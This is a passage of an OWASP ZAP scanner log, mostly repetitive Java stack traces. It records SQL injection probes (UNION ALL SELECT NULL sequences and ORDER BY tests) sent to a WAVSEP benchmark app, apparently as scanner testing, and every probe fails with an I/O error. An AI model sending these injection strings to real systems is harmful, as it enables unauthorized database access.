org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922594 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922595 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922598 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 2323-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 2323-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922600 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922604 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922609 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922610 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922612 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922614 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922615 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922617 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922619 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: 